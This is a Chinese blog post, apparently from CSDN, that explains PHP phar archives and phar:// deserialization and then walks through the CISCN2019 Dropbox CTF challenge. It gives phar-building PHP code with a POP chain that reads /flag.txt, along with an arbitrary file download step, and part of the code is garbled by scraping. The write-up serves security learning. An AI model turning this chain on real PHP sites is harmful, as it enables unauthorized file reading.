pop链构造和phar://协议

最新推荐文章于 2024-02-19 21:32:43 发布
最新推荐文章于 2024-02-19 21:32:43 发布
阅读量716 收藏
点赞数
文章标签: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_48511129/article/details/121897643
版权

phar类似java中的jar包,是一种压缩包。可以对php项目进行打包成 .phar类型的文件,也可以把某个功能模块打包直接发布。
1.配置
要想使用phar文件,必须将phar.readonly配置项配置为0或Off

<?php class B{ public function __destruct(){ echo $this -> name; } } $phar = new Phar("test.phar"); $phar -> startBuffering(); $phar -> setStub("<?php __HALT_COMPILER();?>");

$o = new B();
$o ->name = ‘xenny’;
p h a r − > s e t M e t a d a t a ( phar ->setMetadata( phar>setMetadata(o);
$phar ->addFromString(“test.txt”,“test”);
$phar->stopBuffering();
//file_get_contents(‘phar://test.phar/’);

解释说明
$phar = new Phar(“test.phar”); //输出的文件名为test.phar
$phar -> startBuffering(); //开启缓存,往文件写入内容
$phar -> setStub("<?php __HALT_COMPILER();?>"); //设置标志
$o = new B(); //实例化B类
$o ->name = ‘xenny’; //设置B类的属性name的值为xenny
p h a r − > s e t M e t a d a t a ( phar ->setMetadata( phar>setMetadata(o); //设置媒体数据
$phar ->addFromString(“test.txt”,“test”); //将test的数据导入到phar的压缩包test.txt文件当中 //停止缓存,停止文件写入数据

运行结果
生成了一个test.phar压缩包,里面有几个文件。
在这里插入图片描述
metada.bin内容为序列化后的内容
在这里插入图片描述signature.bin里面的内容
在这里插入图片描述stub.php里面的内容
在这里插入图片描述test.txt里面的内容
在这里插入图片描述file_get_contents(‘phar://test.phar/test.txt’); //会进行一次反序列化
在这里插入图片描述实例
[CISCN2019 华北赛区 Day1 Web1]Dropbox
注册一个账号进行登录
在这里插入图片描述发现一个文件上传点
在这里插入图片描述只能上传图片,但上传后发现可以下载
在这里插入图片描述点击下载抓包,看是否存在任意文件下载
在这里插入图片描述
发现可以进行文件包含,利用该漏洞下载源码

在这里插入图片描述进行代码审计。在index.php里面包含了class.php
在这里插入图片描述跟踪class.php查找FileList这个类,但在这个类中没有Name()和Size()这两个方法,但又调用了这两个方法,FileList中存在__call这个方法。
__call方法,在一个对象的上下文中,如果调用的方法不能访问或不存在的时候,它将被触发
在这里插入图片描述__call又会去调用 f i l e − > file-> file>func()这个方法,在File这个类中存在file_get_contents这个关键字
在这里插入图片描述构造pop链,让其到达file_get_contents函数输出flag。
在这里插入图片描述在user类中发现一个close()方法
在这里插入图片描述构造pop链

<?php class User { public $db; } class File { public $filename; } class FileList { private $files; public function __construct() { $file = new File(); $file->filename = "/flag.txt"; $this->files = array($file); } } $a = new User(); $a->db = new FileList(); $phar = new Phar("phar.phar"); //后缀名必须为phar $phar->startBuffering(); $phar->setStub("<?php __HALT_COMPILER(); ?>"); //设置stub

$o = new User();
$o->db = new FileList();

p h a r − > s e t M e t a d a t a ( phar->setMetadata( phar>setMetadata(a); //将自定义的meta-data存入manifest
$phar->addFromString(“exp.txt”, “test”); //添加要压缩的文件
//签名自动计算
$phar->stopBuffering();
?>
上传生成的文件,在删除哪里抓包,读取flag.
成功读取flag
在这里插入图片描述

g1ory.
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
21-5 PHP反序列化漏洞-POP构造
weixin_43263566的博客
01-20 409
举例来说,假设有以下调用关系:A --> B,B --> C,A --> B --> C。在读代码时,会遇到很多干扰函数或代码,这些函数或代码没有任何作用,只会干扰我们的阅读。总之,要想有效地读懂代码,需要对编程语言的语法和常见函数有一定的了解,同时要有耐心和细心,逐行分析代码,找出关键点。方法中使用了正则表达式检查,我们需要构造一个恶意的序列化对象,以绕过正则表达式的检测。首先,根据代码中的逻辑,我们需要构造一个经过序列化的有效对象,并将其作为。: 这是一个构造函数的魔术方法,在创建类的实例时自动调用。
ppm.phar:ppm相
05-18
wget https://raw.githubusercontent.com/hernandev/ppm.phar/1.0.2/dist/ppm.phar chmod +x ppm.phar 用法 ppm.phar文件只是PPM的包装,这意味着您可以ppm.phar按照直接安装PPM的方式来使用ppm.phar 。 例子: ...
文件包含之——phar协议
abc18964814133的博客
05-09 6443
文件上传之phar协议
php伪协议phar
woshicainiao666的博客
02-19 758
php伪协议---phar
关于php----phar协议phar文件反序列化漏洞利用
m0_62107966的博客
09-12 2041
关于php----phar协议phar文件反序列化漏洞利用phar(php archive)含义为php 归档文件。如果一个由多个文件构成的php应用程序,可以合并打包为一个文件夹,类似于javaweb项目里的jar文件的话,对于程序员来说是很方便的。在PHP5.3之后支持了类似Java的jar包,名为phar。用来将多个PHP文件打包为一个文件。要生成phar文件的话也是很方便,不需要借助额外的工具来创建或者使用,通过php脚本运行就自动在该脚本所在目录下自动创建。
php伪协议
weixin_60719780的博客
01-27 4541
PHP伪协议,也是php支持的协议和封装协议。file:// 访问本地文件系统php:// 访问各个输入/输出流data:// 数据zip:// 压缩流 不过有些伪协议需要allow_url_fopen和allow_url_include的支持。allow_url_fopen On/Off 允许或禁止打开URL文件allow_url_include On/Off 允许或禁止引用URL文件。
文件上传与Phar反序列化的摩擦
Aiwin的博客
11-03 2048
文件上传与Phar反序列化的摩擦和例题
phive:Phar安装和验证环境(PHIVE)
05-02
Phar安装和验证环境(PHIVE) 安装和验证分布式PHP应用程序从未如此简单! 将匹配版本中的所有必需工具(如PHPUnit,PHPMD和phpDox)添加到一个项目中,这曾经是很多重复的工作:首先,找到下载URL,弄清楚sha1和gpg...
信息安全技术:PHP伪协议.pptx
11-01
`phar://`协议用于访问PHP归档(PHAR)文件,这是一种打包PHP代码和资源的方式。PHAR文件可以包含整个项目,便于分发和部署,但应确保对PHAR的签名验证以防止恶意代码注入。 8. rar:// - RAR `rar://`协议允许PHP...
phar:诗篇的Phar居住在作曲家版本环境中的地方
02-13
例如,可以创建一个包含所有项目文件和Composer的Phar,然后在需要运行该项目的环境中直接执行这个Phar文件,而无需关心环境是否已经安装了对应的Composer版本。这大大提高了开发效率,简化了部署流程,并且降低了...
解决PHP 7编译安装错误:cannot stat ‘phar.phar’: No such file or directory
12-18
在IT行业中,尤其是在服务器管理和软件部署的环节,我们经常需要手动编译安装软件来获取最新版本或特定功能。本文将详细解析如何解决在编译安装PHP 7时遇到的“cannot stat ‘phar.phar’: No such file or ...
phar-sample:phar部署的例子
07-12
这个"phar-sample"是一个关于如何使用Phar进行部署的示例项目,通过分析其内容,我们可以深入理解Phar的使用方法和优势。 在PHP中,Phar(PHP Archive)是一种方便的工具,它可以将多个文件和目录封装到一个自包含...
mix-phar-skeleton:Phar命令行程序开发框架
04-24
Mix Phar Skeleton 命令行单执行文件 Phar 开发程序骨架,Mix 封装的命令行基础设施在骨架中都可使用。 我们提供了打包工具 ,可以将本项目打包为 Phar 文件(就像 golang 编译成执行文件一样)。 PHP 原本就是一个...
trainings:培训计划系统
05-04
适合新手培训者和志愿者组织各种培训课程。 技术特点 该Web应用程序基于Fat-Free Framework PHP框架,并使用Bootstrap设计框架。 技术要求: PHP 5.6 MySQL 5.5 最好的选择是基于nginx + PHP-FPM配置运行Web...
利用PHAR协议进行PHP反序列化攻击1
08-03
通过构造特定的类实例和方法调用,如`User`类的析构函数触发`$db->close()`,这里`$db`被赋值为`FileList`类的实例,最终实现文件读取。 这种攻击方式的关键在于理解PHP的反序列化机制,以及如何构造能够触发特定...
利用 phar协议进行文件包含
m0_73612768的博客
11-03 266
在这里前后端都会校验,而且都采用白名单机制,并且 PHP 版本高于 5.2.4 ,什么 %00截断,0x00截断都用不了
php代码审计15.3之phar协议与反序列化
划水的小白白
07-15 732
1、基础 2、生成phar格式文件 3、例子 4、小试牛刀
PHP安全 [伪协议]
weixin_45253622的博客
05-18 888
PHP安全 [伪协议] file://协议 ​http://协议 php://协议 zip:// bzip2:// zlib://协议 data://协议 phar:// 协议 首先在\DVWA-master\vulnerabilities\fi\目录下新建1.txt 2.txt 3.zip方便环境测试。 file://协议 file协议主要用于访问本地计算机中的文件,也就是用于访问本地文件系统,且不受allow_url_fopen与allow_url_include的影响..
SSRF中phar协议和gopher协议的利用
weixin_44687621的博客
09-07 986
我们在学习SSRF漏洞的时候,经常会只关注file协议等,因为利用方式简单。实际上随着php版本的提升和编程技术的规范,能够直接利用的漏洞越来越少了,所以学习使用phar和gopher协议是很有必要的。 phar协议 在php中反序列漏洞,形成的原因首先需要一个unserialize()函数来处理我们传入的可控的序列化payload。但是如果对unserialize()传入的内容进行限制,甚至就不存在可利用的unserialize()函数的时候,就可以借助phar协议触发反序列化操作了 phar流包装器不能
phar://伪协议
最新发布
02-28
phar://伪协议是PHP中的一个特殊协议,用于访问和操作PHP归档文件(.phar文件)。.phar文件是一种将多个PHP文件打包成单个可执行文件的方式,类似于Java中的JAR文件或Python中的ZIP文件。 通过phar://伪协议,可以像操作普通文件一样对.phar文件进行读取、写入和执行等操作。使用该协议,可以方便地加载和使用.phar文件中的类、函数和资源。 以下是phar://伪协议的一些使用示例: 1. 读取.phar文件中的内容: ```php $content = file_get_contents('phar://path/to/file.phar/file.txt'); ``` 2. 执行.phar文件中的PHP脚本: ```php include 'phar://path/to/file.phar/script.php'; ``` 3. 写入内容到.phar文件中: ```php file_put_contents('phar://path/to/file.phar/newfile.txt', 'Hello, World!'); ``` 需要注意的是,为了安全起见,PHP默认情况下禁用了phar://伪协议。如果要使用该协议,需要在php.ini配置文件中启用相关选项或者在代码中使用ini_set函数进行设置。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

g1ory.

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值